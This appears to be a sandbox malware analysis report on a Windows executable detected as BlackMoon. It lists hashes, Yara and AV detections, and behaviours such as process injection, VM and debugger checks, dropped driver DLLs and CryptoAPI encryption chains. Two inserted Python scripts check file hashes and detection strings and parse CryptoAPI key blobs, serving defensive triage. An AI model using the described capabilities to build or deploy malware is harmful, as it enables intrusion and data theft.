
Windows Analysis Report
1734098836319.exe

Overview

General Information

Sample name: 1734098836319.exe
Analysis ID: 1583248
MD5: b2524709c9b62c107eaa1235db37cbdb
SHA1: 798cbea0bbe9b23462be4c5e8a3743399cd529d5
SHA256: e40b03e684f2db354aabacfc64cdaaaff31d27e844febf87c9af66cd39d74989
Tags: exe malware trojan user-Joker

Detection

BlackMoon
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected BlackMoon Ransomware
AI detected suspicious sample
Contains functionality to inject threads in other processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses known network protocols on non-standard ports
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 1734098836319.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\1734098836319.exe" MD5: B2524709C9B62C107EAA1235DB37CBDB)
  • cleanup
No configs have been found
Yara matches (dropped files)
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll | JoeSecurity_blackmoon | Yara detected BlackMoon Ransomware | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll | MALWARE_Win_BlackMoon | Detects executables using BlackMoon RunTime | ditekSHen | 0x306bc:$s1: blackmoon; 0x306fc:$s2: BlackMoon RunTime Error:

Yara matches (memory dumps)
Source | Rule | Description | Author | Strings
00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_blackmoon | Yara detected BlackMoon Ransomware | Joe Security |
00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_blackmoon | Yara detected BlackMoon Ransomware | Joe Security |
00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_blackmoon | Yara detected BlackMoon Ransomware | Joe Security |
00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_blackmoon | Yara detected BlackMoon Ransomware | Joe Security |
00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_blackmoon | Yara detected BlackMoon Ransomware | Joe Security |
(1 further entry not shown)

Yara matches (unpacked PEs)
Source | Rule | Description | Author | Strings
0.3.1734098836319.exe.3273080.25.raw.unpack | JoeSecurity_blackmoon | Yara detected BlackMoon Ransomware | Joe Security |
0.3.1734098836319.exe.3273080.25.raw.unpack | MALWARE_Win_BlackMoon | Detects executables using BlackMoon RunTime | ditekSHen | 0x306bc:$s1: blackmoon; 0x306fc:$s2: BlackMoon RunTime Error:
0.2.1734098836319.exe.32f0000.8.unpack | JoeSecurity_blackmoon | Yara detected BlackMoon Ransomware | Joe Security |
0.2.1734098836319.exe.32f0000.8.unpack | MALWARE_Win_BlackMoon | Detects executables using BlackMoon RunTime | ditekSHen | 0x306bc:$s1: blackmoon; 0x306fc:$s2: BlackMoon RunTime Error:
0.2.1734098836319.exe.676c1f.1.raw.unpack | JoeSecurity_blackmoon | Yara detected BlackMoon Ransomware | Joe Security |
(17 further entries not shown)
                    No Sigma rule has matched
                    No Suricata rule has matched
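The hashes in General Information and the two strings behind the MALWARE_Win_BlackMoon hits above are the indicators a responder can re-check offline. The script below is an added example, not part of the Joe Sandbox report or of either Yara author's rule set: it hashes a file, compares it case-insensitively against the report's MD5/SHA1/SHA256 (the report prints the MD5 in lowercase in one place and uppercase in the process tree), and lists every offset of $s1 "blackmoon" and $s2 "BlackMoon RunTime Error:" in the report's own "offset:$name: string" notation. The rule's real condition is not reproduced in the report, so requiring both strings is an assumption of this example. Caveat: those strings identify the BlackMoon runtime shipped with programs compiled from Easy Programming Language (易语言), which benign EPL programs also carry; the rule's own description says "executables using BlackMoon RunTime", so treat a string hit as a compiler fingerprint and let the hash match and the AV results carry the verdict. The sample buffer built by build_constructed_sample() is constructed test data, not the real file.

```python
"""Added example (not from the Joe Sandbox report): re-check a file against
the report's hashes and the MALWARE_Win_BlackMoon strings, offline."""
import hashlib
import sys
from typing import Dict, List

# Hashes copied from the report's "General Information" section.
REPORT_HASHES = {
    "md5": "b2524709c9b62c107eaa1235db37cbdb",
    "sha1": "798cbea0bbe9b23462be4c5e8a3743399cd529d5",
    "sha256": "e40b03e684f2db354aabacfc64cdaaaff31d27e844febf87c9af66cd39d74989",
}

# The $s1/$s2 strings shown in the report's Yara rows. Byte literals: the
# match is on raw file bytes and is case-sensitive.
BLACKMOON_STRINGS = {
    "$s1": b"blackmoon",
    "$s2": b"BlackMoon RunTime Error:",
}


def hash_file_bytes(data: bytes) -> Dict[str, str]:
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def matches_report(data: bytes, expected: Dict[str, str] = REPORT_HASHES) -> Dict[str, bool]:
    """Per-algorithm match flags. Compared case-insensitively: reports and
    threat feeds mix upper- and lowercase hex, and a case-sensitive compare
    silently misses a true match."""
    actual = hash_file_bytes(data)
    return {alg: actual[alg].lower() == digest.lower() for alg, digest in expected.items()}


def find_all(data: bytes, needle: bytes) -> List[int]:
    offsets, pos = [], data.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(needle, pos + 1)
    return offsets


def scan_blackmoon(data: bytes) -> Dict[str, List[int]]:
    """Offsets of every $s1/$s2 occurrence, in the report's notation order."""
    return {name: find_all(data, s) for name, s in BLACKMOON_STRINGS.items()}


def blackmoon_rule_fires(hits: Dict[str, List[int]]) -> bool:
    # Assumption of this example: the rule condition is not shown in the
    # report, so we require both strings, which is what every listed hit had.
    return all(hits[name] for name in BLACKMOON_STRINGS)


def build_constructed_sample() -> bytes:
    """Constructed test bytes (NOT the real sample): zero padding with $s1 and
    $s2 placed at the offsets the report shows, 0x306bc and 0x306fc."""
    buf = bytearray(0x30800)
    for name, off in (("$s1", 0x306BC), ("$s2", 0x306FC)):
        s = BLACKMOON_STRINGS[name]
        buf[off:off + len(s)] = s
    return bytes(buf)


if __name__ == "__main__":
    # Usage: python check_blackmoon.py <file>   (no argument: constructed sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_constructed_sample()
    for alg, ok in matches_report(data).items():
        print(f"{alg:7}{'MATCH' if ok else 'differs'}")
    hits = scan_blackmoon(data)
    for name, offsets in hits.items():
        for off in offsets:
            print(f"0x{off:x}:{name}: {BLACKMOON_STRINGS[name].decode()}")
    print("BlackMoon runtime strings present:", blackmoon_rule_fires(hits))
```

Run it against the original file to confirm you hold the same sample the report analysed; run it against the dropped 8001[1].dll to see the same two offsets the report lists for that file.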


                    AV Detection

Source: 1734098836319.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll | ReversingLabs: Detection: 47%
Source: 1734098836319.exe | Virustotal: Detection: 70%
Source: 1734098836319.exe | ReversingLabs: Detection: 76%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll | Joe Sandbox ML: detected
Source: 1734098836319.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_0047C367 CryptHashData,CryptGetHashParam | 0_2_0047C367
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_004145B5 CryptAcquireContextA,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptDestroyHash,CryptReleaseContext | 0_2_004145B5
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_004154F3 CryptAcquireContextA,CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt | 0_2_004154F3
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00415BEB CryptAcquireContextA,CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptSetKeyParam,CryptDestroyKey,CryptReleaseContext,CryptGetKeyParam,CryptDestroyKey,CryptReleaseContext,CryptSetKeyParam,CryptDestroyKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,CryptDestroyKey,CryptReleaseContext | 0_2_00415BEB
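The chains at 0_2_004154F3 and 0_2_00415BEB go CryptAcquireContextA, CryptImportKey, CryptSetKeyParam, CryptEncrypt: the key is not generated with CryptGenKey but handed to the CSP as a pre-built key blob, and CryptSetKeyParam then adjusts it (typically the IV or cipher mode) before encryption. The report does not capture the blob or the ALG_ID, so what follows is an added example rather than anything from the report: a parser for the CryptoAPI key blob format CryptImportKey consumes, to triage a blob carved from one of the memory dumps listed above. Constants and the BLOBHEADER / PLAINTEXTKEYBLOB layout are taken from the Windows SDK header wincrypt.h; the blob built by build_constructed_blob() is constructed test data, not material recovered from this sample.

```python
"""Added example (not from the Joe Sandbox report): parse a Microsoft CryptoAPI
key blob as passed to CryptImportKey, and name CryptoAPI ALG_IDs.

Layout (wincrypt.h):
  BLOBHEADER { BYTE bType; BYTE bVersion; WORD reserved; ALG_ID aiKeyAlg; }
  PLAINTEXTKEYBLOB = BLOBHEADER + DWORD cbKey + BYTE key[cbKey]
"""
import struct
from dataclasses import dataclass, field
from typing import List, Optional

CUR_BLOB_VERSION = 2

BLOB_TYPES = {
    0x01: "SIMPLEBLOB",        # session key wrapped with an RSA public key
    0x06: "PUBLICKEYBLOB",
    0x07: "PRIVATEKEYBLOB",
    0x08: "PLAINTEXTKEYBLOB",  # raw symmetric key bytes
    0x09: "OPAQUEKEYBLOB",
}

ALG_IDS = {
    0x6601: "CALG_DES", 0x6602: "CALG_RC2", 0x6603: "CALG_3DES", 0x6609: "CALG_3DES_112",
    0x660E: "CALG_AES_128", 0x660F: "CALG_AES_192", 0x6610: "CALG_AES_256",
    0x6801: "CALG_RC4",
    0xA400: "CALG_RSA_KEYX", 0x2400: "CALG_RSA_SIGN",
    0x8003: "CALG_MD5", 0x8004: "CALG_SHA1", 0x800C: "CALG_SHA_256",
}

# Key lengths the fixed-length block ciphers accept; a mismatch means the
# carved bytes are not a blob CryptImportKey would have taken.
EXPECTED_KEY_LEN = {0x6601: {8}, 0x6603: {24}, 0x6609: {16},
                    0x660E: {16}, 0x660F: {24}, 0x6610: {32}}


def alg_name(alg_id: int) -> str:
    return ALG_IDS.get(alg_id, f"unknown(0x{alg_id:08x})")


@dataclass
class KeyBlob:
    blob_type: str
    version: int
    alg_id: int
    alg: str
    key: Optional[bytes]            # filled only for PLAINTEXTKEYBLOB
    warnings: List[str] = field(default_factory=list)


def parse_key_blob(blob: bytes) -> KeyBlob:
    """Parse the BLOBHEADER and, for PLAINTEXTKEYBLOB, the key bytes. Raises
    ValueError on truncation so nothing is ever read past a short carve."""
    if len(blob) < 8:
        raise ValueError("shorter than BLOBHEADER (8 bytes)")
    b_type, b_version, reserved, alg_id = struct.unpack_from("<BBHI", blob, 0)
    kb = KeyBlob(BLOB_TYPES.get(b_type, f"unknown(0x{b_type:02x})"),
                 b_version, alg_id, alg_name(alg_id), None)
    if b_version != CUR_BLOB_VERSION:
        kb.warnings.append(f"bVersion={b_version}, expected {CUR_BLOB_VERSION}")
    if reserved != 0:
        kb.warnings.append(f"reserved=0x{reserved:04x}, expected 0")
    if b_type == 0x08:
        if len(blob) < 12:
            raise ValueError("PLAINTEXTKEYBLOB truncated before cbKey")
        (cb_key,) = struct.unpack_from("<I", blob, 8)
        if cb_key > len(blob) - 12:
            raise ValueError(f"cbKey={cb_key} exceeds remaining {len(blob) - 12} bytes")
        kb.key = blob[12:12 + cb_key]
        allowed = EXPECTED_KEY_LEN.get(alg_id)
        if allowed and cb_key not in allowed:
            kb.warnings.append(f"cbKey={cb_key} not valid for {kb.alg} (expected {sorted(allowed)})")
    return kb


def is_malformed(blob: bytes) -> bool:
    try:
        parse_key_blob(blob)
        return False
    except ValueError:
        return True


def build_constructed_blob(alg_id: int, key: bytes) -> bytes:
    """Constructed PLAINTEXTKEYBLOB for testing (not recovered from the sample)."""
    header = struct.pack("<BBHI", 0x08, CUR_BLOB_VERSION, 0, alg_id)
    return header + struct.pack("<I", len(key)) + key


if __name__ == "__main__":
    kb = parse_key_blob(build_constructed_blob(0x6610, bytes(range(32))))
    print(kb.blob_type, kb.alg, kb.key.hex(), kb.warnings)
```

When carving, the 8-byte header is the anchor: search a dump for 08 02 00 00 followed by a known ALG_ID in little-endian (for example 10 66 00 00 for CALG_AES_256) and feed each candidate to parse_key_blob(); a PLAINTEXTKEYBLOB that parses cleanly with a valid key length is the key the sample imported.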
Source: 1734098836319.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 39.103.20.61:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: Binary string: C:\Users\BLACK\Desktop\E_Loader 1.0\Release\E_Loader.pdb source: 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2954098082.0000000010000000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: \InfinityHookPro-main\infinity_hook_pro\x64\Debug\infinity_hook_pro.pdb source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: \win10 32-64\kmclass32_64_release\kmclass32_64_release\kmclass\x64\Debug\kmclass.pdb source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: wntdll.pdbUGP source: 1734098836319.exe, 00000000.00000003.1746048706.00000000032FE000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953896278.00000000034A0000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: 1734098836319.exe, 00000000.00000003.1746048706.00000000032FE000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953896278.00000000034A0000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: ).pdb source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: \x64\Debug\Dultx64_win10_FH.pdb source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: \x64\Win7Debug\MKDriver.pdb source: 1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: .pdbk source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp, 1734098836319.exe, 00000000.00000002.2954098082.0000000010014000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_004CF160 FindClose,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,FindNextFileA,FindNextFileA | 0_2_004CF160
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_0045616B
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_00450181
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-28h], esp | 0_2_00440195
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-2Ch], esp | 0_2_00440195
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-48h], esp | 0_2_00440195
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_004842EF
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_0047E392
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-28h], esp | 0_2_0040A535
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-2Ch], esp | 0_2_0040A535
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_00454585
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_00454585
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-0Ch], esp | 0_2_0040480F
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-3Ch], esp | 0_2_00404C1A
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-38h], esp | 0_2_00404C1A
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-34h], esp | 0_2_00404C1A
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-50h], esp | 0_2_00404C1A
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-40h], esp | 0_2_00404C1A
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-10h], esp | 0_2_0040ACF0
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-24h], esp | 0_2_00402DBB
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-2Ch], esp | 0_2_00454EF8
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-00000090h], esp | 0_2_00401326
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-00000094h], esp | 0_2_00401326
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], esp | 0_2_0047F559
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-34h], esp | 0_2_00409662
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-3Ch], esp | 0_2_00409662
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-38h], esp | 0_2_00409662
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-28h], esp | 0_2_00403765
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], esp | 0_2_00439A44
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-1Ch], esp | 0_2_00403A0C
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-0Ch], esp | 0_2_00463ADB
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-10h], esp | 0_2_0040BB11
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-28h], esp | 0_2_0041BB94
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_00455EF4
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_0043FF2B
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-0Ch], esp | 0_2_0040BFD2
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-58h], esp | 0_2_0043A058
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_0045606E
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-0Ch], esp | 0_2_004B0060
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-64h], esp | 0_2_004AC064
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], esp | 0_2_0049E07A
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-24h], esp | 0_2_004BC00A
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], esp | 0_2_00454027
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-28h], esp | 0_2_004B80D8
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], esp | 0_2_004540DD
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-0Ch], esp | 0_2_004560EE
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], esp | 0_2_0049C08F
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_004560AE
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-7Ch], esp | 0_2_004BA0A6
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-34h], esp | 0_2_004BA0A6
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], esp | 0_2_004400B3
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-10h], esp | 0_2_0040E173
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-0Ch], esp | 0_2_0043E178
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-0Ch], esp | 0_2_004A212F
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_004A212F
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-10h], esp | 0_2_0041C12B
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_0040A136
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-0Ch], esp | 0_2_0040A136
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_0046413F
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-18h], esp | 0_2_004B6134
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_0045A1D8
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_0040C1F1
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-0Ch], esp | 0_2_004641F5
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], esp | 0_2_0049C1F3
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], esp | 0_2_004A418E
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_00442196
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], esp | 0_2_004561B4
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-10h], esp | 0_2_00460247
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-0Ch], esp | 0_2_0048224C
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-34h], esp | 0_2_00478272
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-48h], esp | 0_2_00478272
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-44h], esp | 0_2_00478272
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_0042827E
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], esp | 0_2_004C2209
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-54h], esp | 0_2_004C0202
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-74h], esp | 0_2_004C0202
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-44h], esp | 0_2_004C0202
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then add esp, 04h | 0_2_0040421D
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_0040421D
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-18h], esp | 0_2_0040421D
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-0Ch], esp | 0_2_0044222C
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_004A4222
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-30h], esp | 0_2_0040C22C
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then add esp, 0Ch | 0_2_0040C22C
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-18h], esp | 0_2_0040C22C
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_004B02C7
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_004502FE
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], esp | 0_2_0049E283
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], esp | 0_2_004A4297
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-0Ch], esp | 0_2_004562A0
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], esp | 0_2_00464345
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-30h], esp | 0_2_0047C367
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0047C367
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0047C367
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0047C367
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0047C367
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0047C367
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-30h], esp0_2_0047C367
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_004A030F
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_0046A30C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-1Ch], esp0_2_0046A30C
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-0Ch], esp0_2_0043E308
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0040A338
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-18h], esp0_2_0040A338
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0040A338
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0040A338
                    Source: C:\Users\user\Desktop\1734098836319.exeCode function: 4x nop then cmp dword ptr [ebp-14h], esp0_2_0040A338
